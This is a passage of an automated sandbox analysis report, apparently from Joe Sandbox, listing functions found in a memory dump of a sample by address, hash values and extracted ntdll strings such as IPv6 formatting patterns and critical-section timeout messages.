                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f93b57f4db76a579495e51c0a29b98bb7f126ea2e2e3efa215598058ed07c297
                                                              • Instruction ID: b25300b61730eb209adb4d59d70432946cd52e2adc09253ddeaecc94767c2508
                                                              • Opcode Fuzzy Hash: f93b57f4db76a579495e51c0a29b98bb7f126ea2e2e3efa215598058ed07c297
                                                              • Instruction Fuzzy Hash: FE90026520581803D24075584804607402597D0302F55C021E2064565ECA298E516237
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C3010 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: efeb7d3a0e1018d047ac8f5e6c35dcc8ba707dfa2bf30a030817e9cafca49e47
                                                              • Instruction ID: 5e20aa95d0b613650d52991e5ab003aff65655aa896c9706a3fb6c211ba1952b
                                                              • Opcode Fuzzy Hash: efeb7d3a0e1018d047ac8f5e6c35dcc8ba707dfa2bf30a030817e9cafca49e47
                                                              • Instruction Fuzzy Hash: 7890022520585842D24072584804B0F812597E1202F95C029E4156564CC9158A555723
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C3090 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96da54081910ee62204fdb2a70bf442477ed38dd6701d94ca701c3af23183f03
                                                              • Instruction ID: d9b59c428a563d2ac9d79674d33c75148784043e4c6c5e03255cbedde32d4276
                                                              • Opcode Fuzzy Hash: 96da54081910ee62204fdb2a70bf442477ed38dd6701d94ca701c3af23183f03
                                                              • Instruction Fuzzy Hash: AA90022524541C02D240715884147074026D7D0601F55C021E0024564DC6168B6567B3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C35C0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1e70dd3f3fb48fb822bf88571bf5688dc7fe331f507cb5fb944eff1ea7e88f24
                                                              • Instruction ID: 54a95b908d77c32696ab2504641c12d8d9ddb1d2a3a465914f63b16e0ecbf7a2
                                                              • Opcode Fuzzy Hash: 1e70dd3f3fb48fb822bf88571bf5688dc7fe331f507cb5fb944eff1ea7e88f24
                                                              • Instruction Fuzzy Hash: 5290023560951802D20071584514706502597D0201F65C421E0424578DC7958B5166A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C39B0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 20f5b91a21c98f8ae67977d4e064c5c4a1d2ec28717f70ec50039df2742e41a9
                                                              • Instruction ID: a7b5d9d530897a6680a2a3606fa94ab31967271726e903259f8e461fc6f46407
                                                              • Opcode Fuzzy Hash: 20f5b91a21c98f8ae67977d4e064c5c4a1d2ec28717f70ec50039df2742e41a9
                                                              • Instruction Fuzzy Hash: 2690022524946502D250715C44046168025B7E0201F55C031E08145A4DC5558A556323
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: c9426cade94435567d774b5577d00b28502e669af4bd71e45f51fa75c3710862
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 686ab27a6d6ba4500b643cec76a3519bc6dfe5f37d762a9181776f24e87e4b47
                                                              • Instruction ID: ec5a115ac610b5f00e33b3828bf2515228e069156b1398aa8cb4e21ac30cd724
                                                              • Opcode Fuzzy Hash: 686ab27a6d6ba4500b643cec76a3519bc6dfe5f37d762a9181776f24e87e4b47
                                                              • Instruction Fuzzy Hash: 9751D4B6A00116BFDB11DBAC889497FFBB8BB08740B14826DE5A9D7646D374DE4087E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01832410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 2a3436a42040239993f5cb6d1895ce1050a1599744be5f604ecb873b5fcf551b
                                                              • Instruction ID: ff0ea4ca2ddfcd714bfd7f6a72b63c77cd7611e16df06cd3f68a716441f209db
                                                              • Opcode Fuzzy Hash: 2a3436a42040239993f5cb6d1895ce1050a1599744be5f604ecb873b5fcf551b
                                                              • Instruction Fuzzy Hash: 6C51E671A00649AECF70DE5CC89097EF7FAEB84300B588859F596D7681E674EB4087A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017F4725
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017F46FC
                                                              • Execute=1, xrefs: 017F4713
                                                              • ExecuteOptions, xrefs: 017F46A0
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 017F4787
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017F4655
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017F4742
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 72d61fcb5cf6dcfd3ebfa69efa792a9e2fe30994717f823bb2fed3bb5e2158d2
                                                              • Instruction ID: e352325000b7d00ab72590cda92701fd3e64adc5e1fc71bfdcb1d4a1bfc9899f
                                                              • Opcode Fuzzy Hash: 72d61fcb5cf6dcfd3ebfa69efa792a9e2fe30994717f823bb2fed3bb5e2158d2
                                                              • Instruction Fuzzy Hash: 94510971600219ABEF25AAA8DCD9FEEF7B8AF94704F0400EDD605A72D1E7709A458F50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 4744fc8565c4a778583860d3e8ffb84d8eb61db05fa9483a31e957c24c4f8069
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 6F81A070E452499EEF25CE6CC8927FEFBB1AF45BA0F18415EF861A72D1C73498408B51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 018320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 445d8cff1f053c3f660e76a04a934b1e1f743f3a3a72bc48bc77029e8333e903
                                                              • Instruction ID: a7989ba32555532851c0b6f3ec6077b67d0dec8572036975b6f257fadd8e0dbe
                                                              • Opcode Fuzzy Hash: 445d8cff1f053c3f660e76a04a934b1e1f743f3a3a72bc48bc77029e8333e903
                                                              • Instruction Fuzzy Hash: 0421657AA00519ABDB20DF7DCD54AEEBBF9EF94744F08011AE905D3204E730EA018BE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 017F031E
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017F02BD
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017F02E7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 2697b80cf4afce6e82e020453707f873d54368a8c1a7abe875d7b6b9c49f5635
                                                              • Instruction ID: 65364d4350ff1104b4d2eb9d5a0379f4a60b720121ef4f2ce77749e343a8fd86
                                                              • Opcode Fuzzy Hash: 2697b80cf4afce6e82e020453707f873d54368a8c1a7abe875d7b6b9c49f5635
                                                              • Instruction Fuzzy Hash: 32E19A706087429FE725CF28C884B2AFBE1AB84314F544A6DF6A5CB3E2D774D944CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017F728C
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 017F72C1
                                                              • RTL: Resource at %p, xrefs: 017F72A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017F7294
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 5a0736597fb19b8a92665a0a149c9e7b3bf17dae5269e55c4dc9bfc7a91c5b71
                                                              • Instruction ID: fefe65392ec668e556c7380e6d2cd118338708a920dfbd77f6a93f5b737a5ec9
                                                              • Opcode Fuzzy Hash: 5a0736597fb19b8a92665a0a149c9e7b3bf17dae5269e55c4dc9bfc7a91c5b71
                                                              • Instruction Fuzzy Hash: 1F41EE35608206ABD725DE29CC81BAAF7A5FB94710F10061DFE55EB380DB20F8428BD2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01832300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: c2168c5e743305ebc93d8f33850faeddf2d5d87513ea68045b10a5c9fb2abb28
                                                              • Instruction ID: 32070c0c38a3cb8ec38df8a8cdfced0bead761f2efc564ecbf55ebfad49859c7
                                                              • Opcode Fuzzy Hash: c2168c5e743305ebc93d8f33850faeddf2d5d87513ea68045b10a5c9fb2abb28
                                                              • Instruction Fuzzy Hash: CC318472A002199FDB20DE2DCC40BEEB7F9EB44710F58055AE949E3200EB30AA448BE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01789126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 203b7afd5af4ccfcad0428c0718014e9441ec7b1ab876b9ddc6c3cfdb6c57d27
                                                              • Instruction ID: 375d009416e471b1e8872bab0c1172700e7076b88954f1d73cc1192a39d23e2e
                                                              • Opcode Fuzzy Hash: 203b7afd5af4ccfcad0428c0718014e9441ec7b1ab876b9ddc6c3cfdb6c57d27
                                                              • Instruction Fuzzy Hash: FB811C71D002699BDB31DB54CC48BEEB7B8AB48714F1041DAEA19B7640E7709E84CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%